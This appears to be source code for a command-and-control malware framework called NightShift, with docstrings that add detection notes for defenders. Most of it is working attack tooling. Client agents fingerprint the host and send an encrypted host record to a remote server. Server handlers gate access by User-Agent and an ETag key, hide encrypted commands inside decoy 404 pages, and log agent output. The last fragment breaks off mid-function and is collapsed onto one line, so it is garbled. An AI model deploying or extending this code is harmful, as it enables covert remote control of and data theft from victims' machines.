async def Init_Output(request):
    """Handle an agent's initialization POST on the NightShift server.

    A request is accepted only when its ``User-Agent`` equals the POST user
    agent from the server config (index 1) and its ``ETag`` request header
    equals the hash of the DGA-derived key. On a match, the ASCII body is
    decrypted and passed to ``ns_server_log``.

    Detection notes: ``ETag`` is normally a response header, so its presence
    on an inbound request is anomalous. Accepted requests are answered with
    the fixed header ``Server: LiteSpeed 3.13.37``; rejected requests get a
    plain response without it and a different fixed body.
    """
    config = nc_server_config()
    expected_ua = config[1]
    now = datetime.now()
    dga = NightShift_DGA()
    cipher = NightShift_Cipher()
    expected_etag = cipher.hash_keys_hosts(dga.ns_dga_algorithm('key'))
    headers = request.headers
    remote_ip = request.remote
    # The body is read before the header check, as in the original flow.
    body = await request.read()
    user_agent = headers.get('User-Agent')
    etag = headers.get('ETag')

    # Guard clause: anything that fails either header comparison is rejected.
    if user_agent != expected_ua or etag != expected_etag:
        # NOTE(review): '{:s}' raises TypeError when the value is None, so a
        # request with no User-Agent would error here instead of returning.
        rejected_msg = '[+] {0:s} --> Someone knocking but does not have the goods. Remote IP: {1:s} UserAgent: {2:s}'
        print(rejected_msg.format(str(now), remote_ip, user_agent))
        return web.Response(text='Ahhhh, what\'s going on?')

    decrypted = cipher.decrypt(body.decode('ascii'))
    ns_server_log(decrypted)
    accepted_msg = '[+] {0:s} --> New agent initialized. Remote IP: {1:s} UserAgent: {2:s}'
    print(accepted_msg.format(str(now), remote_ip, user_agent))
    return web.Response(
        text='Initialization Complete, welcome to the nightshift.',
        headers={'Server': 'LiteSpeed 3.13.37'},
    )
async def FourOFour(request):
    """Serve tasking to an authenticated agent inside an HTTP 404 page.

    The gate is the same pair of header comparisons used by the other
    handlers: ``User-Agent`` against the GET user agent from the server
    config (index 0) and the ``ETag`` request header against the hash of the
    DGA-derived key. Requests that fail are redirected to the URL stored at
    config index 7.

    Detection notes: the accepted response is a 404 whose HTML body ends
    with an appended ``<!--HTMLDOC:`` ... ``HTMLDOC>`` comment carrying the
    encrypted contents of ``./conf/ns_fof_cmd.json``. A 404 body containing
    that marker, or an inbound request carrying an ``ETag`` header, is a
    useful content signature for proxy or IDS inspection.
    """
    config = nc_server_config()
    expected_ua = config[0]
    redirect_url = config[7]
    now = datetime.now()
    dga = NightShift_DGA()
    cipher = NightShift_Cipher()
    expected_etag = cipher.hash_keys_hosts(dga.ns_dga_algorithm('key'))
    headers = request.headers
    remote_ip = request.remote
    user_agent = headers.get('User-Agent')
    etag = headers.get('ETag')

    # Guard clause: unauthenticated callers are bounced to the redirect URL.
    if user_agent != expected_ua or etag != expected_etag:
        # NOTE(review): '{:s}' raises TypeError when the value is None, so a
        # request with no User-Agent would error here instead of redirecting.
        rejected_msg = '[+] {0:s} --> Someone knocking but does not have the goods. Remote IP: {1:s} UserAgent: {2:s}'
        print(rejected_msg.format(str(now), remote_ip, user_agent))
        return web.HTTPFound(redirect_url)

    accepted_msg = '[+] {0:s} --> A Nightshift Agent has requested payload. Remote IP: {1:s} UserAgent: {2:s}'
    print(accepted_msg.format(str(now), remote_ip, user_agent))

    cmd_path = "./conf/ns_fof_cmd.json"
    page_path = './conf/ns_custom_fof.txt'
    with open(cmd_path, 'r') as cmd_file:
        cmd_text = cmd_file.read()
    encrypted_cmd = cipher.encrypt(cmd_text)
    with open(page_path, 'r') as page_file:
        page_html = page_file.read()
    # The encrypted command is appended to the decoy page as an HTML comment.
    page_html += '<!--HTMLDOC:' + encrypted_cmd + 'HTMLDOC>'
    return web.HTTPNotFound(text=page_html, content_type="text/html")
async def Post_Output(request):
    """Receive an agent's encrypted command output and log it.

    The request is accepted only when ``User-Agent`` equals the POST user
    agent from the server config (index 1) and the ``ETag`` request header
    equals the hash of the DGA-derived key. On a match, the ASCII body is
    decrypted and logged through ``ns_server_log`` together with the
    timestamp and the remote IP.

    Detection notes: an ``ETag`` header on an inbound POST is anomalous.
    Accepted requests get the fixed body ``NightShift hours recorded`` with
    ``Server: LiteSpeed 3.13.37``; rejected requests get a different fixed
    body and no such header.
    """
    now = datetime.now()
    config = nc_server_config()
    expected_ua = config[1]
    dga = NightShift_DGA()
    cipher = NightShift_Cipher()
    expected_etag = cipher.hash_keys_hosts(dga.ns_dga_algorithm('key'))
    headers = request.headers
    remote_ip = request.remote
    # The body is read before the header check, as in the original flow.
    body = await request.read()
    user_agent = headers.get('User-Agent')
    etag = headers.get('ETag')

    # Guard clause: anything that fails either header comparison is rejected.
    if user_agent != expected_ua or etag != expected_etag:
        # NOTE(review): '{:s}' raises TypeError when the value is None, so a
        # request with no User-Agent would error here instead of returning.
        rejected_msg = '[+] {0:s} --> Someone knocking but does not have the goods. Remote IP: {1:s} UserAgent: {2:s}'
        print(rejected_msg.format(str(now), remote_ip, user_agent))
        return web.Response(text='Ahhhh, what\'s going on?')

    decrypted = cipher.decrypt(body.decode('ascii'))
    log_record = {
        "time": str(now),
        "ns_client_ip": remote_ip,
        "ns_post_data": decrypted,
    }
    ns_server_log(log_record)
    accepted_msg = '[+] {0:s} --> A Nightshift Agent has responded with it data output Remote IP: {1:s} UserAgent: {2:s}'
    print(accepted_msg.format(str(now), remote_ip, user_agent))
    return web.Response(
        text='NightShift hours recorded',
        headers={'Server': 'LiteSpeed 3.13.37'},
    )
async def ns_init_call(self, ns_init_json_path, ns_getua_data, ns_postua_data, ns_initsite_data, ns_initsitep_data):
    """Run the agent's first check-in and write its local init record.

    Sends a GET to ``ns_initsite_data``. If the body is exactly
    ``'Test Sucessful'`` (spelled as shown), POSTs the encrypted host record
    to ``ns_initsitep_data``. In either case the host record is then written
    as JSON to ``ns_init_json_path``.

    Returns:
        A four-item list: the init flag, the hash of hostname + ``os.name``,
        ``os.name`` and the hostname.

    Host and network artifacts for defenders: both requests carry an
    ``ETag`` *request* header plus the configured user agents, and a JSON
    file holding ``host_data`` and ``host_hash`` is written to disk.

    NOTE(review): this listing was collapsed onto one line, so the nesting
    of the ``if``/``else`` and of the file write is reconstructed here.
    Confirm it against the upstream file.
    """
    ns_get_key = NightShift_DGA()
    ns_get_cipher = NightShift_Cipher()
    # Host Info
    ns_host_name_f = socket.gethostname()
    ns_os_type_f = os.name
    # The host identifier is the hash of hostname concatenated with os.name.
    ns_host_os_to_hash = str(ns_host_name_f + ns_os_type_f)
    ns_host_os_hashed_f = ns_get_cipher.hash_keys_hosts(ns_host_os_to_hash)
    # Server Contact Info
    ns_comms_chk_url = ns_initsite_data
    ns_post_url = ns_initsitep_data
    ns_hdr_key = ns_get_key.ns_dga_algorithm('key')
    ns_hash_key = ns_get_cipher.hash_keys_hosts(ns_hdr_key)
    # Same ETag value on both requests; only the User-Agent differs.
    ns_comms_hdr = {'User-Agent': ns_getua_data, 'ETag': ns_hash_key}
    ns_post_hdr = {'User-Agent': ns_postua_data, 'ETag': ns_hash_key}
    try:
        # trust_env=True makes aiohttp honour proxy settings from the
        # environment, so this traffic may traverse a configured proxy.
        async with aiohttp.ClientSession(trust_env=True) as session:
            async with session.get(ns_comms_chk_url, headers=ns_comms_hdr) as response:
                ns_comms_html = await response.text()
                if ns_comms_html == 'Test Sucessful':
                    ns_init_f = True
                    ns_init_config_f = {
                        "host_data": {
                            "os_type": ns_os_type_f,
                            "host_name": ns_host_name_f,
                            "ns_init": ns_init_f
                        },
                        "host_hash": ns_host_os_hashed_f
                    }
                    # The POST body is the encrypted str() of the dict, not JSON.
                    ns_post_data = ns_get_cipher.encrypt(str(ns_init_config_f))
                    async with session.post(ns_post_url, headers=ns_post_hdr, data=ns_post_data) as response:
                        # The reply text is read but not used afterwards.
                        ns_post_init_html = await response.text()
                else:
                    ns_init_f = False
                    ns_init_config_f = {
                        "host_data": {
                            "os_type": ns_os_type_f,
                            "host_name": ns_host_name_f,
                            "ns_init": ns_init_f
                        },
                        "host_hash": ns_host_os_hashed_f
                    }
                # On-disk artifact: the init record is written as plain JSON.
                with open(ns_init_json_path, 'w') as ns_init_w:
                    json.dump(ns_init_config_f, ns_init_w)
    except aiohttp.client_exceptions.ClientConnectorError:
        # Only connection failures are handled; other exceptions propagate.
        ns_init_f = False
        print(
            '[+] {0} --> NightShift Server connection to configured port is unavailable.'
            .format(str(datetime.now())),
            file=sys.stderr)
    response = list(
        (ns_init_f, ns_host_os_hashed_f, ns_os_type_f, ns_host_name_f))
    return response
async def FourOFour(self, ns_get_ua, ns_fof_url):
    """Fetch the tasking page from the server and return its body text.

    The GET carries ``ns_get_ua`` as ``User-Agent`` and the hash of the
    DGA-derived key in an ``ETag`` request header. If the request raises any
    exception, the exception's string form is returned in place of the page
    body, so the caller cannot tell an error from content by type alone.

    Detection note: ``ETag`` on an outbound request is unusual for normal
    clients and is the agent's most distinctive header.
    """
    async with aiohttp.ClientSession() as http:
        dga = NightShift_DGA()
        cipher = NightShift_Cipher()
        etag_value = cipher.hash_keys_hosts(dga.ns_dga_algorithm('key'))
        request_headers = {'User-Agent': ns_get_ua, 'ETag': etag_value}
        try:
            async with http.get(ns_fof_url, headers=request_headers) as reply:
                page_text = await reply.text()
        except Exception as err:
            # Deliberate best-effort: errors are returned as text, not raised.
            page_text = str(err)
    return page_text
async def CommsCheck(request):
    """Answer an agent's connectivity probe.

    The request is accepted only when ``User-Agent`` equals the GET user
    agent from the server config (index 0) and the ``ETag`` request header
    equals the hash of the DGA-derived key. Accepted requests get the fixed
    body ``Test Sucessful`` (spelled as shown). All others are redirected to
    the URL stored at config index 7.

    Detection notes: the misspelled fixed body and the
    ``Server: LiteSpeed 3.13.37`` header on accepted responses are static
    strings. An ``ETag`` header on the inbound GET is anomalous.
    """
    config = nc_server_config()
    expected_ua = config[0]
    redirect_url = config[7]
    now = datetime.now()
    dga = NightShift_DGA()
    cipher = NightShift_Cipher()
    expected_etag = cipher.hash_keys_hosts(dga.ns_dga_algorithm('key'))
    headers = request.headers
    remote_ip = request.remote
    user_agent = headers.get('User-Agent')
    etag = headers.get('ETag')

    # Guard clause: unauthenticated callers are bounced to the redirect URL.
    if user_agent != expected_ua or etag != expected_etag:
        # NOTE(review): '{:s}' raises TypeError when the value is None, so a
        # request with no User-Agent would error here instead of redirecting.
        rejected_msg = '[+] {0:s} --> Someone knocking but does not have the goods. Remote IP: {1:s} UserAgent: {2:s}'
        print(rejected_msg.format(str(now), remote_ip, user_agent))
        return web.HTTPFound(redirect_url)

    accepted_msg = '[+] {0:s} --> New agent coming online. Remote IP: {1:s} UserAgent: {2:s}'
    print(accepted_msg.format(str(now), remote_ip, user_agent))
    return web.Response(
        text='Test Sucessful',
        headers={'Server': 'LiteSpeed 3.13.37'},
    )
output_b64 = base64.b64encode(bytes(output, 'utf-8')).decode('ascii') return time_stamp, output_b64 if __name__ == "__main__": print(Fore.GREEN + r""" ╔═╗─╔╗───╔╗─╔╗╔═══╦╗───╔═╦╗──╔══╗─────────────────╔╗╔╗─────╔═╗╔═╗──╔╗──────╔╗─╔╗─╔═══╗╔╗ ║║╚╗║║───║║╔╝╚╣╔═╗║║───║╔╝╚╗─║╔╗║────────────────╔╝╚╣║─────║║╚╝║║──║║──────║║╔╝╚╗║╔═╗║║║ ║╔╗╚╝╠╦══╣╚╩╗╔╣╚══╣╚═╦╦╝╚╗╔╬╗║╚╝╚╦╗╔╦═╦═╗╔╦═╗╔══╗╚╗╔╣╚═╦══╗║╔╗╔╗╠╦═╝╠═╗╔╦══╣╚╩╗╔╝║║─║╠╣║ ║║╚╗║╠╣╔╗║╔╗║║╚══╗║╔╗╠╬╗╔╣║╚╝║╔═╗║║║║╔╣╔╗╬╣╔╗╣╔╗║─║║║╔╗║║═╣║║║║║╠╣╔╗║╔╗╬╣╔╗║╔╗║║─║║─║╠╣║ ║║─║║║║╚╝║║║║╚╣╚═╝║║║║║║║║╚╦╗║╚═╝║╚╝║║║║║║║║║║╚╝║─║╚╣║║║║═╣║║║║║║║╚╝║║║║║╚╝║║║║╚╗║╚═╝║║╚╗ ╚╝─╚═╩╩═╗╠╝╚╩═╩═══╩╝╚╩╝╚╝╚═╩╝╚═══╩══╩╝╚╝╚╩╩╝╚╩═╗║─╚═╩╝╚╩══╝╚╝╚╝╚╩╩══╩╝╚╩╩═╗╠╝╚╩═╝╚═══╩╩═╝ ──────╔═╝║───────────────────────────────────╔═╝║───────────────────────╔═╝║ Client ──────╚══╝───────────────────────────────────╚══╝───────────────────────╚══╝ version 0.9 """) ns_get_cipher = NightShift_Cipher() ns_client = NightShift_Client() ns_init_chkr = NightShift_Init_Check().ns_init_check() ns_initchk_tf = ns_init_chkr[0] ns_host_hash = ns_init_chkr[1] ns_host_os = ns_init_chkr[2] ns_host_name = ns_init_chkr[3] ns_fof_url = ns_init_chkr[4] ns_post_url = ns_init_chkr[5] ns_get_ua = ns_init_chkr[6] ns_post_ua = ns_init_chkr[7] loop = asyncio.get_event_loop() while True: try: ns_fof_html = loop.run_until_complete( ns_client.FourOFour(ns_get_ua, ns_fof_url))